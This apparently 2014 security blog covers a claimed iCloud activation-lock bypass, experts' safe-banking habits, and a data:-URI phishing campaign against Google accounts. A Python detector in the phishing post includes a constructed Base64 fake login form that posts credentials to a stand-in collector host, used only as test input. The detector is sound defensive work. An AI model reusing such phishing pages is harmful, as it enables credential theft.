Saturday, May 24, 2014

Apple iCloud stormed by Dutch Hackers

Apple's cloud service, iCloud, is probably one of the more secure cloud services. It is the cloud storage and cloud computing service that Apple Inc. has provided to its users since October 2011, with more than 320 million users across the world.

Two hackers, one going by the name AquaXetine and a Moroccan hacker going by the name Merruktechnolog, claim to have hacked the Apple iCloud system. The hackers used a man-in-the-middle attack to unlock locked Apple devices.

According to a report from Dutch news organization De Telegraaf, the hackers purchased locked iPhone devices for $50 to $150 each and then bypassed Apple’s iCloud activation lock through a serious security vulnerability that Apple has failed to patch with its most recent updates. The iCloud service allows users to store and back up data such as music, photos, applications, documents, bookmarks, reminders, backups, notes, iBooks, and contacts, and provides a platform for Apple's email servers and calendars.

Security experts say that hackers can do more with the vulnerability: an attacker can read messages and also steal Apple ID credentials from the devices. The hackers worked for five months to breach the security of the Apple iCloud system. Yesterday the doulCi hacker group posted on Twitter that it had “processed” more than 5,700 Apple devices in just five minutes using the hack. Acting with good intentions, the hackers reported the vulnerability to the Apple security team back in March, but the Apple team never responded to their report.

This led the hackers to disclose the vulnerability publicly. The pair are offering unlocking services via the doulCi.nl website, according to information found on the site. With this, doulCi is the world’s first alternative iCloud server and the world’s first iCloud activation bypass.


Wednesday, May 21, 2014

Tips from cyber experts to tread safely

They know the risks of the internet better than anyone, but most cyber experts still shop and bank online with care.

"We operate in the 21st century ... I've got to shop online, I've got to pay my bills online," Brigadier General Paul Nakasone, deputy commander of US Army Cyber Command, said at the Reuters Cybersecurity Summit.

"You can't really function without it," agreed Nart Villeneuve, researcher at the cybersecurity firm FireEye.

Some actions can leave you wide open for data abuse, like checking into a hotel and handing over a credit card, he said. "I guess you could pull up with a money clip but I don't know that you can even do that," he said.

The tricks that the smartest cybersecurity minds use for online safety hygiene are basic: Avoid websites that are visibly questionable, don't thoughtlessly click on links or attachments, monitor your account activity regularly and only give away the minimum amount of information.

On passwords, the bulwark of online security, experts also stuck to simple rules: Make them complex and change them regularly. Some also said they use more secure login processes when available.

"I tend to be a bit of a two-factor authentication freak," said Eddie Schwartz, cyber chief at Verizon, saying he always takes advantage of any extra security steps offered, like confirming his login with a code sent to his cellphone.

Another key to safe online shopping and banking is using internet connections that are as secure as possible.

"I never do it on the road. I never do it from my mobile device," said Michael Hayden, former director of the CIA and the National Security Agency.

While most experts avoid using public wireless internet connections, some go further.

"I have a separate computer and router for financial transactions," said Dan Kaufman, director of information innovation at the Defense Advanced Research Projects Agency (DARPA), the arm of the US Defense Department credited with inventing the internet.

Kaufman said he searches for potential online purchases on one computer, then moves to a second computer to make the transaction.

Digital Bond CEO Dale Peterson had a similar strategy: a separate computer, "with its own 20-plus character password," for online banking and payroll purposes.

In a breach revealed in December by US retailer Target Corp, some 40 million credit or debit card records and 70 million other customer records, such as addresses and telephone numbers, were stolen. The perpetrators remain at large.

Several cyber experts said they felt less concerned about the potential to lose credit card data, because of limited liability, but draw the line at online banking and modern conveniences like depositing checks by smartphone.

"I'm paranoid about online banking," said Stuart McClure, CEO of security firm Cylance. "I'm a little bit more comfortable now but I hate to do online banking. I hate it.

"I used to change my passwords so much that I'd forget them over time. And I never ever put my PIN into anything electronic, only physical devices. And even then, I'm pulling up, looking for skimmers," he said, referring to devices made to secretly swipe card information from ATM machines.

Is total avoidance a solution?

"I am not one who says that the answer is to withdraw from the digital world that we live in. I just don't think that's particularly realistic," said Admiral Mike Rogers, the new director of the NSA. "Let's deal with the world the way it is."

Saturday, May 17, 2014

A New Phishing method to steal Google account details

Security experts at Bitdefender discovered a new ingenious phishing scheme that is being used by hackers to steal Google Account credentials.

The new phishing attack is hard to catch with traditional heuristic detection; it mainly affects the Google Chrome and Mozilla Firefox browsers.

The hackers send an email that pretends to be from Google; it warns the victim that their account will be locked in the next 24 hours because the associated inbox has reached its maximum capacity.

“With access to users’ Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,” reports Catalin Cosoi, chief security strategist at Bitdefender, in the official blog post. “The scam starts with an email allegedly sent by Google, with “Mail Notice” or “New Lockout Notice” as a subject.”

To keep the Google account from being “locked in 24 hours”, the user is invited to follow the “INSTANT INCREASE” link, but the link redirects victims to a bogus Google login page. Using this trick, hackers can steal Google account credentials within the browser.

Cosoi explained that it is very difficult for users to notice the attack because the fake Google login page goes undetected in Google Chrome: the attackers exploit the way Chrome displays “data:” uniform resource identifiers (URIs).

Users will see “data:” in the address bar of their browser, which indicates the use of the data URI scheme. This scheme allows data to be included in-line in web pages as if it were an external resource.

“The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake web page in an encoded string within the data URI. As Google Chrome doesn’t show the whole string, regular users have a hard time figuring out they are targeted in a phishing attack and may give their data to cyber-criminals.” states the post.

Bitdefender says that the scammers are able to avoid detection by using the data URI scheme, which includes data in-line in web pages as if it were an external resource. The content of the fake web page is encoded in a string within the data URI; the attackers used Base64 encoding to represent the file contents.
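A defender can undo the same encoding to inspect what such a link carries. The following is an added example, not code from Bitdefender or from the original post: it finds data: URIs in a message body or a resolved redirect target, decodes them, and flags those that contain an HTML form with a password field. The function names, the sample body and the collector.example host are constructed for illustration.

```python
import base64
import re
from urllib.parse import unquote_to_bytes

# RFC 2397 layout: data:[<mediatype>][;base64],<data>
DATA_URI = re.compile(r"\bdata:([^,\s\"'<>]*),([^\s\"'<>]+)", re.IGNORECASE)
PASSWORD_FIELD = re.compile(rb"<input[^>]+type\s*=\s*[\"']?password", re.IGNORECASE)
FORM_TAG = re.compile(rb"<form\b", re.IGNORECASE)


def decode_data_uri(header: str, payload: str) -> tuple[str, bytes]:
    """Return (media type, decoded body) for one data: URI."""
    params = header.split(";")
    mediatype = params[0].strip().lower() or "text/plain"
    raw = unquote_to_bytes(payload)  # undo any percent-encoding first
    if any(p.strip().lower() == "base64" for p in params[1:]):
        raw += b"=" * (-len(raw) % 4)  # tolerate stripped padding
        try:
            return mediatype, base64.b64decode(raw)
        except ValueError:  # malformed Base64: nothing to inspect
            return mediatype, b""
    return mediatype, raw


def find_login_data_uris(text: str) -> list[dict]:
    """Flag data: URIs whose decoded HTML contains a password form."""
    findings = []
    for match in DATA_URI.finditer(text):
        mediatype, body = decode_data_uri(match.group(1), match.group(2))
        if mediatype != "text/html":
            continue  # inline images, fonts and so on are not login pages
        if FORM_TAG.search(body) and PASSWORD_FIELD.search(body):
            findings.append({"offset": match.start(),
                             "mediatype": mediatype,
                             "decoded_bytes": len(body)})
    return findings


# Constructed sample: one benign inline image and one encoded login form.
_FAKE_PAGE = (b'<html><form action="https://collector.example/">'
              b'<input name="u"><input type="password" name="p"></form></html>')
SAMPLE_BODY = ('<img src="data:image/gif;base64,R0lGODlhAQABAAAAACw="> '
               '<a href="data:text/html;base64,'
               + base64.b64encode(_FAKE_PAGE).decode() + '">INSTANT INCREASE</a>')

if __name__ == "__main__":
    for finding in find_login_data_uris(SAMPLE_BODY):
        print(finding)
```

Because the campaign described here reached the data: URI through a shortened URL, a check like this is most useful on the final redirect target rather than only on the link text in the email.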


According to Bitdefender, more than a thousand users were deceived by the phishing scheme.

“So far, more than a thousand users clicked on a single shortened URL used in the cyber-campaign. The numbers are without doubt a lot higher, as scammers create more than a single URL when crafting a phishing wave,” added Cosoi.

Phishing is becoming one of the most popular fraudulent activities in the cyber-criminal ecosystem; hackers are exploiting new platforms like mobile and social media, according to reports from major security firms.

Cyber criminals are trying to make phishing attacks harder to detect by optimizing their email targeting, and attackers have shown that they can find new methods of bypassing the checks implemented by email providers and security firms.

Usually a targeted attack exploits the “human factor”; phishing offensives rely on social engineering techniques, which is why it is important to inform users of the tactics adopted by cyber criminals.

Organisations must train their personnel to reduce their human attack surface and avoid becoming victims of such attacks.
So, be careful while using Google accounts.